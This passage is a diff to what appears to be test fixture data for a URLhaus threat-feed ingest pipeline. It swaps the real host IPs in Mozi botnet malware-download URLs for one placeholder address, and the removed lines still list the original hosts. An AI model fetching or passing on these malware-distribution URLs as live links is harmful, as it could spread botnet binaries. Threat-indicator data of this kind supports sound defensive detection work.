"{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://195.87.190.106:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"195.87.190.106\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025719700Z", + "original": "{\"id\":\"961375\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961375/\",\"url\":\"http://89.160.20.156:54796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8220,18 +8220,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://183.188.139.70:35251/Mozi.m", + "original": "http://89.160.20.156:35251/Mozi.m", "scheme": "http", "port": 35251, - "domain": "183.188.139.70", - "full": "http://183.188.139.70:35251/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35251/Mozi.m" }, - "ip": "183.188.139.70" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693130445Z", - "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://183.188.139.70:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"183.188.139.70\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025726600Z", + "original": "{\"id\":\"961376\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961376/\",\"url\":\"http://89.160.20.156:35251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8269,18 +8269,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.173.201:50562/Mozi.m", + "original": "http://89.160.20.156:50562/Mozi.m", "scheme": "http", "port": 50562, - "domain": "117.222.173.201", - "full": "http://117.222.173.201:50562/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50562/Mozi.m" }, - "ip": "117.222.173.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693133391Z", - "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://117.222.173.201:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.173.201\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025733600Z", + "original": "{\"id\":\"961373\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961373/\",\"url\":\"http://89.160.20.156:50562/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8318,18 +8318,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.215.248.158:33445/Mozi.m", + "original": "http://89.160.20.156:33445/Mozi.m", "scheme": "http", "port": 33445, - "domain": "117.215.248.158", - "full": "http://117.215.248.158:33445/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33445/Mozi.m" }, - "ip": "117.215.248.158" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693137118Z", - "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://117.215.248.158:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.215.248.158\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025740500Z", + "original": "{\"id\":\"961374\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961374/\",\"url\":\"http://89.160.20.156:33445/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8367,18 +8367,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.85.197.148:60280/Mozi.a", + "original": "http://89.160.20.156:60280/Mozi.a", "scheme": "http", "port": 60280, - "domain": "120.85.197.148", - "full": "http://120.85.197.148:60280/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60280/Mozi.a" }, - "ip": "120.85.197.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693140845Z", - "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://120.85.197.148:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.197.148\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025747400Z", + "original": "{\"id\":\"961370\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961370/\",\"url\":\"http://89.160.20.156:60280/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8416,18 +8416,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.126.66.149:46386/Mozi.m", + "original": "http://89.160.20.156:46386/Mozi.m", "scheme": "http", "port": 46386, - "domain": "182.126.66.149", - "full": "http://182.126.66.149:46386/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46386/Mozi.m" }, - "ip": "182.126.66.149" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693144392Z", - "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://182.126.66.149:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.66.149\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025754200Z", + "original": "{\"id\":\"961371\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961371/\",\"url\":\"http://89.160.20.156:46386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8465,18 +8465,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.113.4.64:60288/Mozi.m", + "original": "http://89.160.20.156:60288/Mozi.m", "scheme": "http", "port": 60288, - "domain": "182.113.4.64", - "full": "http://182.113.4.64:60288/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60288/Mozi.m" }, - "ip": "182.113.4.64" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693147858Z", - "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://182.113.4.64:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.113.4.64\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025761200Z", + "original": "{\"id\":\"961372\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961372/\",\"url\":\"http://89.160.20.156:60288/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8514,18 +8514,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://113.116.144.14:49731/Mozi.a", + "original": "http://89.160.20.156:49731/Mozi.a", "scheme": "http", "port": 49731, - "domain": "113.116.144.14", - "full": "http://113.116.144.14:49731/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49731/Mozi.a" }, - "ip": "113.116.144.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693151084Z", - "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://113.116.144.14:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"113.116.144.14\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025768200Z", + "original": "{\"id\":\"961368\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961368/\",\"url\":\"http://89.160.20.156:49731/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8563,18 +8563,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.56.186.224:38837/Mozi.a", + "original": "http://89.160.20.156:38837/Mozi.a", "scheme": "http", "port": 38837, - "domain": "115.56.186.224", - "full": "http://115.56.186.224:38837/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38837/Mozi.a" }, - "ip": "115.56.186.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693154491Z", - "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://115.56.186.224:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.186.224\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025775100Z", + "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://89.160.20.156:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8612,18 +8612,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.159.43:37814/Mozi.m", + "original": "http://89.160.20.156:37814/Mozi.m", "scheme": "http", "port": 37814, - "domain": "115.48.159.43", - "full": "http://115.48.159.43:37814/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37814/Mozi.m" }, - "ip": "115.48.159.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693179947Z", - "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://115.48.159.43:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.159.43\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025782Z", + "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://89.160.20.156:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8661,18 +8661,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.233.247:47507/Mozi.m", + "original": "http://89.160.20.156:47507/Mozi.m", "scheme": "http", "port": 47507, - "domain": "115.50.233.247", - "full": "http://115.50.233.247:47507/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47507/Mozi.m" }, - "ip": "115.50.233.247" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693188463Z", - "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://115.50.233.247:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.233.247\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025789100Z", + "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://89.160.20.156:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8710,18 +8710,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.58.39.251:47140/i", + "original": "http://89.160.20.156:47140/i", "scheme": "http", "port": 47140, - "domain": "115.58.39.251", - "full": "http://115.58.39.251:47140/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47140/i" }, - "ip": "115.58.39.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693193181Z", - "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://115.58.39.251:47140/i\",\"url_status\":\"online\",\"host\":\"115.58.39.251\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025795900Z", + "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://89.160.20.156:47140/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8759,18 +8759,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://42.224.170.54:41514/Mozi.a", + "original": "http://89.160.20.156:41514/Mozi.a", "scheme": "http", "port": 41514, - "domain": "42.224.170.54", - "full": "http://42.224.170.54:41514/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41514/Mozi.a" }, - "ip": "42.224.170.54" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693196958Z", - "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://42.224.170.54:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"42.224.170.54\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025802900Z", + "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://89.160.20.156:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8808,18 +8808,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.100.87:58748/Mozi.m", + "original": "http://89.160.20.156:58748/Mozi.m", "scheme": "http", "port": 58748, - "domain": "42.235.100.87", - "full": "http://42.235.100.87:58748/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58748/Mozi.m" }, - "ip": "42.235.100.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693200615Z", - "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://42.235.100.87:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.100.87\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025811100Z", + "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://89.160.20.156:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8857,18 +8857,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://175.168.229.209:51183/Mozi.m", + "original": "http://89.160.20.156:51183/Mozi.m", "scheme": "http", "port": 51183, - "domain": "175.168.229.209", - "full": "http://175.168.229.209:51183/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51183/Mozi.m" }, - "ip": "175.168.229.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693204372Z", - "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://175.168.229.209:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"175.168.229.209\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025818500Z", + "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://89.160.20.156:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8906,18 +8906,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.164.30:42104/Mozi.m", + "original": "http://89.160.20.156:42104/Mozi.m", "scheme": "http", "port": 42104, - "domain": "182.119.164.30", - "full": "http://182.119.164.30:42104/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42104/Mozi.m" }, - "ip": "182.119.164.30" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693207859Z", - "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://182.119.164.30:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.164.30\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025825300Z", + "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://89.160.20.156:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8955,18 +8955,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.52.56:53130/Mozi.m", + "original": "http://89.160.20.156:53130/Mozi.m", "scheme": "http", "port": 53130, - "domain": "42.224.52.56", - "full": "http://42.224.52.56:53130/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53130/Mozi.m" }, - "ip": "42.224.52.56" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693211786Z", - "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://42.224.52.56:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.52.56\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025832200Z", + "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://89.160.20.156:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9004,18 +9004,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.255.134.250:57768/Mozi.m", + "original": "http://89.160.20.156:57768/Mozi.m", "scheme": "http", "port": 57768, - "domain": "58.255.134.250", - "full": "http://58.255.134.250:57768/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57768/Mozi.m" }, - "ip": "58.255.134.250" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693215183Z", - "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://58.255.134.250:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.255.134.250\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025839200Z", + "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://89.160.20.156:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9053,18 +9053,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.54.138:34541/Mozi.m", + "original": "http://89.160.20.156:34541/Mozi.m", "scheme": "http", "port": 34541, - "domain": "42.230.54.138", - "full": "http://42.230.54.138:34541/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34541/Mozi.m" }, - "ip": "42.230.54.138" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693218960Z", - "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://42.230.54.138:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.54.138\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025846100Z", + "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://89.160.20.156:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9102,18 +9102,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://219.156.51.117:51344/Mozi.a", + "original": "http://89.160.20.156:51344/Mozi.a", "scheme": "http", "port": 51344, - "domain": "219.156.51.117", - "full": "http://219.156.51.117:51344/Mozi.a" + "domain": 